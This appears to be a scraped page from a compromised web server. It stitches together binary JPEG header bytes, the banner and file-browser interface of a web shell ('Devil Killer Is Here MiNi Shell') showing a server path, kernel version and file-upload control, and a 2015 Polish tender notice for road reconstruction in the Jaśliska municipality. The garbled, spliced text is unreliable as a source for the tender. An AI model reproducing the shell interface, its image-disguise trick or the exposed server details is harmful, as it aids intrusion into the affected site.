JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150827/222108-N-2015.html

<p class="kh_header"><b>Jaśliska: Przebudowa dróg w gminie Jaśliska</b><br>
<b>Numer ogłoszenia: 222108 - 2015; data zamieszczenia: 27.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Jaśliska , Jaśliska 171, 38-485 Jaśliska, woj. podkarpackie, tel. 13 4310581, faks 13 4310593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jasliska.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg w gminie Jaśliska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. CZĘŚĆ I:
Przedmiotem zamówienia jest przebudowa drogi gminnej NR G114553 w miejscowości Daliowa, obejmująca wykonanie odwodnienia  wraz z wykonaniem zjazdów oraz umocnieniem skarp.
Zadanie będzie realizowane w oparciu o projekt budowlano przebudowy drogi gminnej NR G114553 w miejscowości Jaśliska, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej z uwzględnieniem wymagań określonych w szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz z zachowaniem warunków określonych w SIWZ.
Parametry techniczne drogi:
- droga jednojezdniowa, jednokierunkowa, 
- ilość pasów ruchu - jednopasowa,
- szerokość jezdni - 2,70m,
- szerokość pasa ruchu - 2,70m
Zakres prac do wykonania:
- umocnienie dna rowu korytkami ściekowymi betonowymi szer. 0,50 [m],
- umocnienie ścian rowu płytami chodnikowymi o wym. 0,50x0,50x0,07 [m],
- wykonanie zjazdów z rur HDPE o śr. 400 mm oraz blachy ryflowanej ułożonej na korytkach ściekowych,
- wykonanie studzienek z osadnikiem i syfonem,
- wykonanie umocnienia skarpy płytami typu JOMB o wym. 100 x 75 x 12,5 [cm].
1.1. Zakres robót:
1) Roboty drogowe, w tym:
a) Roboty ziemne
* Roboty ziemne pod ścieki betonowe,
* Roboty ziemne pod ścieki betonowe.
b) Podbudowa jezdni:
* Zagęszczenie warstwy gruntu pod korytkami,
* Podbudowa pod korytka z kruszywa łamanego.
c) Elementy ulic:
* Ułożenie ścieków drogowych korytkowych,
* Wykonanie przepustów pod zjazdami z rur HDPE,
* Wykonanie studzienek z osadnikiem i syfonem,
* Wykonanie zjazdów z blachy ryflowanej ułożonej na korytkach ściekowych,
d) Roboty wykończeniowe:
* Wykonanie umocnienia skarpy płytami typu JOMB o wym. 100 x 75 x 12,5 [cm].
2) Inne prace i roboty towarzyszące.
1.2. Szczegółowy zakres prac będących przedmiotem zamówienia określa dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót (STWiOR), przedmiar robót oraz opis przedmiotu zamówienia zawarty w rozdziale II SIWZ - Opis przedmiotu zamówienia.
1.3. Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień (CPV): 
45233300-2 - Podbudowy
45100000-8 - Roboty przygotowawcze
45111200-0 - Roboty ziemne
45233000-9 - Roboty dodatkowe i wykończeniowe
2. CZĘŚĆ II:
Przedmiotem zamówienia jest przebudowa drogi gminnej dz. nr ewid. 492 w miejscowości Posada Jaśliska, obejmująca wykonanie nawierzchni wraz z wykonaniem poboczy i wyczyszczeniem rowu odwadniającego.
Zadanie będzie realizowane w oparciu o projekt budowlano przebudowy drogi dz. nr ewid. 492 w miejscowości Posada Jaśliska, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej z uwzględnieniem wymagań określonych w szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz z zachowaniem warunków określonych w SIWZ.
Parametry techniczne drogi:
- droga jednojezdniowa, jednokierunkowa, 
- ilość pasów ruchu - jednopasowa,
- szerokość jezdni - 2,50 m,
- szerokość pasa ruchu - 2,50 m
Zakres prac do wykonania:
- profilowanie i zagęszczenie podłoża pod nawierzchnię jezdni,
- wykonanie podbudowy z kruszywa łamanego,
- wykonanie nawierzchni jezdni w systemie podwójnego powierzchniowego utrwalenia,
- wykonanie czyszczenia rowu.
2.1. Zakres robót:
1) Roboty drogowe, w tym:
a) Roboty przygotowawcze i rozbiórkowe drogi:
* Roboty ziemne pod konstrukcje nawierzchni,
* Profilowanie i zagęszczanie warstwy pod warstwy konstrukcyjne.
b) Podbudowa jezdni:
* Podbudowa z kruszywa łamanego.
c) Nawierzchnia jezdni:
* Nawierzchnia jezdni w systemie podwójnego powierzchniowego utrwalenia,
d) Czyszczenie rowu:
* Wykonanie czyszczenia rowu.
2) Inne prace i roboty towarzyszące.
2.2. Szczegółowy zakres prac będących przedmiotem zamówienia określa dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót (STWiOR), przedmiar robót oraz opis przedmiotu zamówienia zawarty w rozdziale II SIWZ - Opis przedmiotu zamówienia.
2.3. Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień (CPV): 
45233100-0 - Nawierzchnie
45233300-2 - Podbudowy
45100000-8 - Roboty przygotowawcze
45111200-0 - Roboty ziemne
45233000-9 - Roboty dodatkowe i wykończeniowe
3. CZĘŚĆ III:
Przedmiotem zamówienia jest przebudowa drogi gminnej dz. nr ewid. 1604 w miejscowości Jaśliska, obejmująca wykonanie zjazdów, profilowaniem jezdni oraz wyczyszczeniem rowu odwadniającego.
Zadanie będzie realizowane w oparciu o projekt budowlano przebudowy drogi dz. nr ewid. 1604 w miejscowości Posada Jaśliska, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej z uwzględnieniem wymagań określonych w szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz z zachowaniem warunków określonych w SIWZ.
Parametry techniczne drogi:
- droga jednojezdniowa, jednokierunkowa, 
- ilość pasów ruchu - jednopasowa,
- szerokość jezdni - 3,00 m,
- szerokość pasa ruchu - 3,00 m
Zakres prac do wykonania:
- profilowanie i zagęszczenie podłoża pod nawierzchnię jezdni,
- wykonanie zjazdów z rur HDPE o śr. 500 mm,
3.1. Zakres robót:
1) Roboty drogowe, w tym:
a) Roboty przygotowawcze i rozbiórkowe drogi
* Roboty ziemne,
* Zagęszczenie warstwy gruntu pod korytkami,
b) Odwodnienie:
* Wykonanie przepustów pod zjazdami z rur HDPE wraz z przyczółkami i nawierzcnią,
2) Inne prace i roboty towarzyszące.
3.2. Szczegółowy zakres prac będących przedmiotem zamówienia określa dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót (STWiOR), przedmiar robót oraz opis przedmiotu zamówienia zawarty w rozdziale II SIWZ - Opis przedmiotu zamówienia.
3.3. Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień (CPV): 
45233100-0 - Nawierzchnie
45233300-2 - Podbudowy
45100000-8 - Roboty przygotowawcze
45111200-0 - Roboty ziemne
45233000-9 - Roboty dodatkowe i wykończeniowe
II. Inne prace towarzyszące i wymagania zamawiającego przy realizacji zadania:
Do wykonawcy należy: 
1) Przed przystąpieniem do robót ziemnych Wykonawca zlokalizuje istniejące uzbrojenie terenu i dokona sprawdzenia położenia i głębokości posadowienia przewodów infrastruktury technicznej. Prace ziemne w pobliżu urządzeń infrastruktury technicznej należy wykonywać ręcznie pod nadzorem pracowników wyznaczonych przez właścicieli sieci. Zabezpieczenie przez Wykonawcę infrastruktury technicznej winno być wykonane zgodnie z zaleceniami dysponentów sieci wynikającymi z warunków technicznych i uzgodnień dokumentacji projektowej. W przypadku uszkodzeń sieci lub urządzeń koszty naprawy lub ich wymiany ponosi Wykonawca. Wykonawca ponosi odpowiedzialność za skutki ekonomiczne, cywilne i związane z bezpieczeństwem w przypadku uszkodzenia sieci i przyłączy infrastruktury technicznej.
2) Wszystkie istniejące urządzenia infrastruktury technicznej należy wyregulować wysokościowo do projektowanych rzędnych
3) Wykonanie niezbędnych pomiarów, prób i badań w zakresie wykonywanych robót.
4) Geodezyjne wytyczenie obiektu w terenie, bieżąca obsługa.
5) Wywóz i utylizacja wszelkich materiałów pochodzących z rozbiórki i uporządkowanie terenu po robotach budowlanych w zakresie i na koszt Wykonawcy. Wywóz materiałów nastąpi we wskazane miejsce przez Zamawiającego, lub sołtysa wsi na którego terenie realizowana jest inwestycja. W przypadku nie wskazania miejsca wywózki Wykonawca dokona wywozu wg własnego uznania.
III. Warunki realizacji przedmiotu zamówienia
1. Roboty będące przedmiotem zamówienia wykonawca wykona kompleksowo zgodnie ze sztuką budowlaną oraz obowiązującymi przepisami i normami oraz zgodnie z zaleceniami wynikającymi z dokumentacji projektowej.
2. W ramach robót, o których mowa w pkt. I Wykonawca:
- zabezpieczy trwale i oznakuje teren budowy zgodnie z przepisami,
- dokona urządzenia placu budowy i poniesie koszty utrzymania zaplecza budowy,
- będzie dbał o porządek na terenie budowy podczas wykonywania robót,
- uporządkuje teren budowy po zakończeniu robót, 
- zapewni ochronę terenów przyległych do placu budowy i ponosi odpowiedzialność cywilną za ewentualne szkody wynikłe z tytułu prowadzonych prac wobec osób trzecich,
- będzie prowadził roboty w sposób wolny od przeszkód komunikacyjnych i będzie minimalizował utrudnienia w ruchu kołowym i pieszym, w szczególności umożliwi właścicielom przyległych nieruchomości bezpieczny dojazd i dojście do nieruchomości.
- zabezpieczy przed zniszczeniem stałe znaki stabilizowanej osnowy geodezyjnej,
- zabezpieczy obiekt przed niekorzystnymi warunkami atmosferycznymi w sposób skuteczny,
- grunty zajęte w czasie realizacji inwestycji przywróci do stanu pierwotnego sprzed ich zajęcia,
- roboty objęte zamówieniem zobowiązuje się wykonać pod kierownictwem osób posiadających odpowiednie uprawnienia do kierowania robotami budowlanymi w tym zakresie. 
3. Uwzględniając specyfikę obiektu i warunki prowadzenia robót na Wykonawcy spoczywa obowiązek zabezpieczenia robót pod względem technicznym i bezpieczeństwa, monitorowanie budowy podczas przerw technologicznych i przerw spowodowanych wystąpieniem niekorzystnych warunków atmosferycznych oraz ocena ryzyka dla zadania inwestycyjnego uwzględniająca zagrożenia jakie mogą wystąpić w okresie realizacji zadania w związku z prowadzonymi robotami, przyjętą technologią i sposobem wykonywania robót oraz uwzględniać ryzyko związane z wystąpieniem niekorzystnych warunków atmosferycznych w czasie realizacji zadania.
4. Przed przystąpieniem do robót, o terminie rozpoczęcia prac budowlanych w obrębie urządzeń infrastruktury technicznej wykonawca zobowiązany jest powiadomić właścicieli tych urządzeń  z odpowiednim wyprzedzeniem przed planowanym terminem rozpoczęcia prac. Roboty budowlane należy wykonywać zgodnie z warunkami i zaleceniami właścicieli sieci infrastruktury technicznej. Wykonawca ponosi odpowiedzialność za zniszczenia infrastruktury technicznej w trakcie prowadzenia robót Jeżeli nastąpią uszkodzenia jakiegokolwiek elementu infrastruktury podziemnej lub naziemnej Wykonawca będzie zobowiązany do jego naprawy na własny koszt. 
5. Przy realizacji umowy Wykonawca zobowiązuje się stosować materiały i wyroby dopuszczone do obrotu i powszechnego lub jednostkowego stosowania w budownictwie zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane i ustawą o wyrobach budowlanych z dn. 16 kwietnia 2004r. wraz z dokumentami potwierdzającymi ich jakość. Wykonawca przed zastosowaniem jakichkolwiek urządzeń i materiałów przedstawi inspektorowi nadzoru źródło ich pochodzenia, atesty lub aprobaty techniczne, certyfikaty, deklaracje zgodności, świadectwa badań laboratoryjnych oraz świadectwa dopuszczenia do stosowania w budownictwie. W przypadku wątpliwości co do jakości zastosowanych urządzeń lub materiałów Zamawiający ma prawo przekazać urządzenie i/lub materiał do badań laboratoryjnych. Negatywny wynik badań spowoduje wstrzymanie odbioru przez zamawiającego. Każdy rodzaj robót, w których znajdą się materiały lub urządzenia nieodpowiadające normom i niezaakceptowane przez Zamawiającego, Wykonawca wykonuje na własne ryzyko, licząc się z jego nie przyjęciem i niezapłaceniem. 
6. Wszelkie wskazane z nazwy materiały i przyjęte technologie użyte w dokumentacji projektowej należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Traktować je należy jako przykładowe informacje. Zamawiający dopuszcza stosowanie materiałów równoważnych dla nazwanych materiałów wymienionych w dokumentacji projektowej z zachowaniem wymogów w zakresie jakości i bezpieczeństwa. Materiały muszą gwarantować realizację robót zgodnie z dokumentacją projektową i zapewniać uzyskanie parametrów technicznych i jakościowych nie gorszych (tj. takich samych lub lepszych) od założonych w dokumentacji projektowej i SIWZ.
7. Wykonawca udzieli Zamawiającemu rękojmi i gwarancji jakości, liczonej od daty końcowego,  bezusterkowego odbioru robót.
8. Wszelkie roszczenia użytkowników dróg, mieszkańców, użytkowników garaży jakie wpłyną do Zamawiającego, związane z wykonywaniem robót będą kierowane do Wykonawcy w celu ich wyjaśnienia lub załatwienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.00-0, 45.23.33.00-2, 45.10.00.00-8, 45.11.12.00-0, 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (zał. Nr 3)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (zał. Nr 3)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (zał. Nr 3)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (zał. Nr 3)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (zał. Nr 3)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
b) dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
c) pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (np. wg wzoru - załącznik nr 7 lub inny równoważny dokument - patrz uwaga do punktu 8.1.2.1) SIWZ, jeżeli wykonawca przy wykazywaniu spełniania warunków udziału w postępowaniu, o których mowa w pkt 8.1.1.2 i/lub 8.1.1.3 SIWZ powołuje się na potencjał innych podmiotów.
d) Kosztorys ofertowy sporządzony na bazie przedmiaru robót.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin rękojmi i gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania za jego zgodą następujących zmian postanowień zawartej umowy w stosunku do treści oferty:
1.1. Terminu wykonania zadania w następujących przypadkach:
1.1.1.	 Niesprzyjających warunków pogodowych.
1.1.2.	 Niedopełnieniu przez Zamawiającego jego obowiązków wynikających z umowy.
1.1.3.	 Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego.
1.1.4.	 Z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego wykonawcę, robót.
1.1.5.	 Z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu lub grożącego powstaniem szkody w znacznych rozmiarach.
1.1.6.	 Z powodu stanu wyższej konieczności, powodującego podjęcie działań w celu uchylenia bezpośredniego niebezpieczeństwa grożącego dobru społecznemu lub jakiemukolwiek dobru jednostki,
1.1.7.	 Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
1.1.8.	 Zawieszenia wykonania prac niespowodowanych uchybieniami Wykonawcy,
1.1.9.	 Wystąpienia okoliczności, których nie można było wcześniej przewidzieć, a są one niezależne od stron,
1.1.10. Ograniczenia lub czasowego wstrzymania finansowania przedmiotu umowy. 
2. W przypadku zaistnienia potrzeby zmiany rozwiązań technicznych gdy materiały nie mogą być użyte przy realizacji inwestycji z powodu: zaprzestania produkcji lub zastąpienia innymi; w trakcie wykonywania zamówienia nastąpiła zmiana przepisów Prawa budowlanego; w trakcie realizacji zamówienia zastosowano lepsze materiały bądź inną technologię o lepszych parametrach technicznych wynikającą z dostępności danych produktów na rynku, gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie od zaproponowanego w projekcie, przy czym wykonanie robót zamiennych nie może skutkować zwiększeniem wartości wynagrodzenia wykonawcy. Zmiana może być wprowadzona na wniosek Wykonawcy lub Zamawiającego i zaakceptowana przez Zamawiającego i nie może skutkować zwiększeniem wartości umowy, określonej w § 3 ust.1 umowy.
3. Gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i na które strony nie miały wpływu.
4.Jeżeli wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy, zmiana podwykonawcy możliwa jest po przedłożeniu przez Wykonawcę dokumentów potwierdzających spełnianie warunków udziału w postępowaniu przez zaproponowanego podwykonawcę. 
